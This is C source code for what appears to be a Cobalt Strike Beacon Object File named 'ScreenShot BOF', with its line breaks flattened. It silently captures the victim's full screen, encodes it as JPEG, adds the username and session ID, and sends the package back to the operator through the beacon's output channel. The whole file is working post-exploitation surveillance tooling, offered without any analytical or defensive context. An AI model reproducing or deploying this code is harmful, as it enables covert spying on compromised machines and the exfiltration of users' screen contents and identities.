#define CINTERFACE #define COBJMACROS #include #include #include #include #include #include #include "beacon.h" #define CALLBACK_SCREENSHOT 0x03 #define SUCCEEDED(hr) (((HRESULT)(hr)) >= 0) #ifdef _WIN64 CONST GUID GUID_ContainerFormatJpeg= { 0x19e4a5aa, 0x5662, 0x4fc5, 0xa0, 0xc0, 0x17, 0x58, 0x02, 0x8e, 0x10, 0x57}; CONST GUID GUID_WICPixelFormat24bppBGR= { 0x6fddc324, 0x4e03, 0x4bfe, 0xb1, 0x85, 0x3d, 0x77, 0x76, 0x8d, 0xc9, 0x0c}; CONST GUID CLSID_WICImagingFactory2= { 0x317d06e8, 0x5f24, 0x433d, 0xbd, 0xf7, 0x79, 0xce, 0x68, 0xd8, 0xab, 0xc2}; CONST GUID IID_IWICImagingFactory = {0xec5ec8a9,0xc395,0x4314,0x9c,0x77,0x54,0xd7,0xa9,0x35,0xff,0x70}; #else CONST GUID GUID_ContainerFormatJpeg= { 0x19e4a5aa, 0x5662, 0x4fc5, 0xa0, 0xc0, 0x17, 0x58, 0x02, 0x8e, 0x10, 0x57}; CONST GUID GUID_WICPixelFormat24bppBGR= { 0x6fddc324, 0x4e03, 0x4bfe, 0xb1, 0x85, 0x3d, 0x77, 0x76, 0x8d, 0xc9, 0x0c}; CONST GUID CLSID_WICImagingFactory2= { 0x317d06e8, 0x5f24, 0x433d, 0xbd, 0xf7, 0x79, 0xce, 0x68, 0xd8, 0xab, 0xc2}; CONST GUID IID_IWICImagingFactory = {0xec5ec8a9,0xc395,0x4314,0x9c,0x77,0x54,0xd7,0xa9,0x35,0xff,0x70}; CONST GUID CLSID_WICImagingFactory = {0xcacaf262, 0x9370, 0x4615, 0xa1, 0x3b, 0x9f, 0x55, 0x39, 0xda, 0x4c, 0x0a}; #endif DECLSPEC_IMPORT void *__cdecl MSVCRT$malloc(size_t size); WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); WINBASEAPI int __cdecl MSVCRT$_snprintf(char * ,size_t ,const char * ,...); DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ProcessIdToSessionId(DWORD, DWORD *); DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId(); DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); DECLSPEC_IMPORT char* WINAPI MSVCRT$getenv(const char *varname); DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop); DECLSPEC_IMPORT int WINAPI GDI32$GetObjectW(HANDLE h,int c,LPVOID pv); DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); void downloadScreenshot(char* jpg, int jpgLen, int session, char* windowTitle, int titleLen, char* username, int usernameLen) { int messageLength; char* packedData ; int packedIndex = 4; int i; messageLength = 4 + jpgLen + 4 + 4 + titleLen + 4 + usernameLen; packedData = (char*)MSVCRT$malloc(messageLength); packedData[0] = jpgLen & 0xFF; packedData[1] = (jpgLen >> 8) & 0xFF; packedData[2] = (jpgLen >> 16) & 0xFF; packedData[3] = (jpgLen >> 24) & 0xFF; for (i = 0; i < jpgLen; i++) { packedData[packedIndex] = jpg[i]; packedIndex++; } packedData[packedIndex] = session & 0xFF; packedData[packedIndex + 1] = (session >> 8) & 0xFF; packedData[packedIndex + 2] = (session >> 16) & 0xFF; packedData[packedIndex + 3] = (session >> 24) & 0xFF; packedData[packedIndex + 4] = titleLen & 0xFF; packedData[packedIndex + 5] = (titleLen >> 8) & 0xFF; packedData[packedIndex + 6] = (titleLen >> 16) & 0xFF; packedData[packedIndex + 7] = (titleLen >> 24) & 0xFF; packedIndex += 8; for (i = 0; i < titleLen; i++) { packedData[packedIndex] = windowTitle[i]; packedIndex++; } packedData[packedIndex] = usernameLen & 0xFF; packedData[packedIndex + 1] = (usernameLen >> 8) & 0xFF; packedData[packedIndex + 2] = (usernameLen >> 16) & 0xFF; packedData[packedIndex + 3] = (usernameLen >> 24) & 0xFF; packedIndex += 4; for (i = 0; i < usernameLen; i++) { packedData[packedIndex] = username[i]; packedIndex++; } BeaconOutput(CALLBACK_SCREENSHOT, packedData, messageLength); return; } int go() { HANDLE hDIB; HANDLE hFile; DWORD dwBmpSize; DWORD dwSizeofDIB; DWORD dwBytesWritten; HBITMAP hbmScreen = NULL; BITMAP bmpScreen; BITMAPFILEHEADER bmfHeader; BITMAPINFOHEADER bi; CHAR* lpbitmap; BITMAP bm_info = { 0 }; IWICImagingFactory* factory = NULL; IWICBitmap* wic_bitmap = NULL; IWICStream* stream = NULL; IWICBitmapEncoder* encoder = NULL; IWICBitmapFrameEncode* frame = NULL; HRESULT hr = S_OK; BYTE* Memory; char* user = (char*)MSVCRT$getenv("USERNAME"); char title[] = "ScreenShot BOF"; int userLength = MSVCRT$_snprintf(NULL, 0, "%s", user); int titleLength = MSVCRT$_snprintf(NULL, 0, "%s", title); DWORD session = -1; INT width = User32$GetSystemMetrics(SM_CXSCREEN); INT height = User32$GetSystemMetrics(SM_CYSCREEN); HDC hdcScreen = User32$GetDC(NULL); HDC hdcMemDC = GDI32$CreateCompatibleDC(hdcScreen); if (!hdcMemDC) { goto done; } hbmScreen = GDI32$CreateCompatibleBitmap(hdcScreen, width, height); if (!hbmScreen) { goto done; } GDI32$SelectObject(hdcMemDC, hbmScreen); if (!GDI32$BitBlt( hdcMemDC, 0, 0, width, height, hdcScreen, 0, 0, SRCCOPY)) { goto done; } GDI32$GetObjectW(hbmScreen, sizeof(BITMAP), &bmpScreen); bi.biSize = sizeof(BITMAPINFOHEADER); bi.biWidth = bmpScreen.bmWidth; bi.biHeight = bmpScreen.bmHeight; bi.biPlanes = 1; bi.biBitCount = 32; bi.biCompression = BI_RGB; bi.biSizeImage = 0; bi.biXPelsPerMeter = 0; bi.biYPelsPerMeter = 0; bi.biClrUsed = 0; bi.biClrImportant = 0; dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight; Memory = MSVCRT$malloc(500 * 1024); MSVCRT$memset(Memory, 0, 500 * 1024); hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); if (!GDI32$GetObjectW(hbmScreen, sizeof(bm_info), &bm_info)) { hr = E_FAIL; } factory = NULL; if (SUCCEEDED(hr)) { hr = OLE32$CoCreateInstance(&CLSID_WICImagingFactory, NULL, CLSCTX_INPROC_SERVER, &IID_IWICImagingFactory, &factory); } wic_bitmap = NULL; if (SUCCEEDED(hr)) { hr = IWICImagingFactory_CreateBitmapFromHBITMAP(factory, hbmScreen, NULL, WICBitmapIgnoreAlpha, &wic_bitmap); } stream = NULL; if (SUCCEEDED(hr)) { hr = IWICImagingFactory_CreateStream(factory, &stream); } if (SUCCEEDED(hr)) { hr = IWICStream_InitializeFromMemory(stream, Memory, 500 * 1024); } encoder = NULL; if (SUCCEEDED(hr)) { hr = IWICImagingFactory_CreateEncoder(factory, &GUID_ContainerFormatJpeg, NULL, &encoder); } if (SUCCEEDED(hr)) { hr = IWICBitmapEncoder_Initialize(encoder, (IStream*)stream, WICBitmapEncoderNoCache); } frame = NULL; if (SUCCEEDED(hr)) { hr = IWICBitmapEncoder_CreateNewFrame(encoder, &frame, NULL); } if (SUCCEEDED(hr)) { hr = IWICBitmapFrameEncode_Initialize(frame, NULL); } if (SUCCEEDED(hr)) { hr = IWICBitmapFrameEncode_SetSize(frame, bm_info.bmWidth, bm_info.bmHeight); } if (SUCCEEDED(hr)) { GUID pixel_format = GUID_WICPixelFormat24bppBGR; hr = IWICBitmapFrameEncode_SetPixelFormat(frame, &pixel_format); } if (SUCCEEDED(hr)) { hr = IWICBitmapFrameEncode_WriteSource(frame, (IWICBitmapSource*)wic_bitmap, NULL); } if (SUCCEEDED(hr)) { hr = IWICBitmapFrameEncode_Commit(frame); } if (SUCCEEDED(hr)) { hr = IWICBitmapEncoder_Commit(encoder); } KERNEL32$ProcessIdToSessionId(KERNEL32$GetCurrentProcessId(), &session); downloadScreenshot((char*)Memory, 500*1024, session, (char*)title, titleLength, (char*)user, userLength); if (frame) { IWICBitmapFrameEncode_Release(frame); } if (encoder) { IWICBitmapEncoder_Release(encoder); } if (stream) { IWICStream_Release(stream); } if (wic_bitmap) { IWICBitmap_Release(wic_bitmap); } if (factory) { IWICImagingFactory_Release(factory); } done: GDI32$DeleteObject(hbmScreen); GDI32$DeleteObject(hdcMemDC); User32$ReleaseDC(NULL, hdcScreen); return 0; }